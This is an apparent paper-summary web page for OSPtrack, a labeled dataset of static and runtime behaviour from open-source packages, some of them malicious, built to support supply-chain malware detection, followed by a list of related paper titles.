Abstract:Open-source software serves as a foundation for the internet and the cyber supply chain, but its exploitation is becoming increasingly prevalent. While advances in vulnerability detection for OSS have been significant, prior research has largely focused on static code analysis, often neglecting runtime indicators. To address this shortfall, we created a comprehensive dataset spanning five ecosystems, capturing features generated during the execution of packages and libraries in isolated environments. The dataset includes 9,461 package reports, of which 1,962 are identified as malicious, and encompasses both static and dynamic features such as files, sockets, commands, and DNS records. Each report is labeled with verified information and detailed sub-labels for attack types, facilitating the identification of malicious indicators when source code is unavailable. This dataset supports runtime detection, enhances detection model training, and enables efficient comparative analysis across ecosystems, contributing to the strengthening of supply chain security.

What problem does this paper attempt to address?

The main problem that this paper attempts to solve is the deficiencies of existing open - source software (OSS) vulnerability detection methods, especially the limitations of static code analysis in capturing runtime behavior. Specifically: 1. **Limitations of Static Code Analysis**: Most of the existing research mainly focuses on static code analysis and ignores runtime metrics. This has led to insufficient detection of OSS vulnerabilities embedded in complex systems. 2. **Lack of a Comprehensive Dataset for OSS Runtime Behavior**: Although there are some publicly available datasets that focus on the collection of malicious packages and libraries, these datasets fail to cover runtime behavior, especially dynamic features such as files, sockets, commands, and DNS records. To solve these problems, the author has created a comprehensive dataset named OSPtrack, which has the following characteristics: - **Multi - Ecosystem Coverage**: The dataset covers five major open - source software ecosystems (npm, pypi, crates.io, nuget, packagist), ensuring a wide range of application scenarios. - **Includes Static and Dynamic Features**: Each report includes not only the results of static code analysis but also the dynamic features generated at runtime, such as file operations, network activities, and command executions. - **Detailed Label Information**: Each report in the dataset is labeled with verification information and detailed sub - labels for identifying attack types (such as data leakage, malicious command execution, etc.), enabling the identification of malicious behavior even in the absence of source code. By providing such a comprehensive dataset, the author aims to support runtime detection, enhance the training of detection models, and promote efficient comparative analysis between different ecosystems, thereby strengthening the security of the supply chain. ### Formula Representation Although this paper does not involve complex mathematical formulas, when describing some statistical information in the dataset generation process, simple Markdown format can be used to represent key numbers: - The dataset includes 9,461 package reports, of which 1,962 are confirmed as malicious. - The dataset covers 8 - dimensional features, including file, socket, command, and DNS - related behaviors. This information helps to convey the scale and content of the dataset more clearly.

OSPtrack: A Labeled Dataset Targeting Simulated Execution of Open-Source Software

OSS Malicious Package Analysis in the Wild

Towards Robust Detection of Open Source Software Supply Chain Poisoning Attacks in Industry Environments

OSS License Identification at Scale: A Comprehensive Dataset Using World of Code

Taxonomy of Attacks on Open-Source Software Supply Chains

LLM-Enhanced Static Analysis for Precise Identification of Vulnerable OSS Versions

ProvSec: Open Cybersecurity System Provenance Analysis Benchmark Dataset with Labels

ARVO: Atlas of Reproducible Vulnerabilities for Open Source Software

A System for Automated Open-Source Threat Intelligence Gathering and Management

A Large-scale Fine-grained Analysis of Packages in Open-Source Software Ecosystems

A Manually-Curated Dataset of Fixes to Vulnerabilities of Open-Source Software

Causative Insights into Open Source Software Security using Large Language Code Embeddings and Semantic Vulnerability Graph

Vulnerabilities and Security Patches Detection in OSS: A Survey

Software Supply Chain Risk Assessment Framework

OSLDetector

SpiderScan: Practical Detection of Malicious NPM Packages Based on Graph-Based Behavior Modeling and Matching

Backstabber's Knife Collection: A Review of Open Source Software Supply Chain Attacks

Maintainable Log Datasets for Evaluation of Intrusion Detection Systems

Journey to the Center of Software Supply Chain Attacks

Insights and Current Gaps in Open-Source LLM Vulnerability Scanners: A Comparative Analysis

Tracking Patches for Open Source Software Vulnerabilities